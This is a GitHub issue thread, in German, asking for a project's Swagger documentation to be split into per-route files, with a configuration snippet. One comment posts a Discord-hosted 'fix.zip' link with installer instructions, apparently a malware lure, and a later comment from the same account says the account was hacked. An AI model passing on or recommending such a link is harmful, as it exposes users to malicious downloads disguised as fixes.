### ISSUE TITLE
Swagger-Dokumentation auslagern und erweitern

### ISSUE THREAD

**Issue by akocerke** [akocerke/API-Ford-Fiesta-Veranstaltungen#12]
**Swagger-Dokumentation für alle Routen auslagern und erweitern**

**Beschreibung:**
Aktuell existiert nur eine Route in der Swagger-Dokumentation (`/comments/all`). Um die Dokumentation übersichtlich und erweiterbar zu gestalten, sollen alle Routen in separaten Dateien dokumentiert und organisiert werden. Jede Route erhält ihre eigene Swagger-Dokumentationsdatei.

![Image](https://github.com/user-attachments/assets/ce6b293f-46a5-41ab-a281-41ab6afff96b)

**Aufgaben:**

1. **Erstellen von separaten Swagger-Dokumentationsdateien für bestehende Routen:**
   - Erstelle eine Datei für jede Route im `swagger`-Verzeichnis.
     - `swagger/admins.js`
     - `swagger/users.js`
     - `swagger/comments.js` (diese Datei existiert bereits)
     - `swagger/events.js`
     - `swagger/ratings.js`
     - `swagger/violations.js`

2. **Übertragen der bestehenden Dokumentation:**
   - Übertrage die bestehende Swagger-Dokumentation aus `swaggerEndpoints.js` in die jeweilige Datei (`swagger/comments.js`).

3. **Swagger-Konfiguration anpassen:**
   - Aktualisiere `swaggerConfig.js`, um alle neuen Dokumentationsdateien einzubinden.
   - Passe die `apis`-Option in `swaggerOptions` an, um die neuen Dateien zu berücksichtigen:
     ```javascript
     const swaggerOptions = {
       swaggerDefinition: {
         openapi: '3.0.0',
         info: {
           title: 'API FORD FIESTA VERANSTALTUNGEN',
           version: '1.0.0',
           description: 'API Dokumentation mit Swagger',
         },
         servers: [
           {
             url: 'http://localhost:5050/api-ford-fiesta',
             description: 'Entwicklungsserver',
           },
         ],
       },
       apis: [
         path.join(__dirname, 'swagger/admins.js'),
         path.join(__dirname, 'swagger/users.js'),
         path.join(__dirname, 'swagger/comments.js'),
         path.join(__dirname, 'swagger/events.js'),
         path.join(__dirname, 'swagger/ratings.js'),
         path.join(__dirname, 'swagger/violations.js'),
       ],
     };
     ```

4. **Erweitern der Dokumentation:**
   - Dokumentiere jede Route in ihrer eigenen Datei.
   - Verwende das gleiche Format, das du bereits in `swagger/comments.js` verwendet hast.

**Akzeptanzkriterien:**
- Jede Route hat eine eigene, dedizierte Swagger-Dokumentationsdatei.
- Die `swaggerConfig.js` ist so konfiguriert, dass sie alle Dokumentationsdateien korrekt einbindet.
- Die Swagger UI zeigt die vollständige und organisierte Dokumentation für alle Routen an.

**Comment by SNWCreations** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by SNWCreations** [comment]
DO NOT BELIEVE MY DELETED COMMENT PLS
MY ACCOUNT GOT HACKED
IM CONTACTING GITHUB SUPPORT
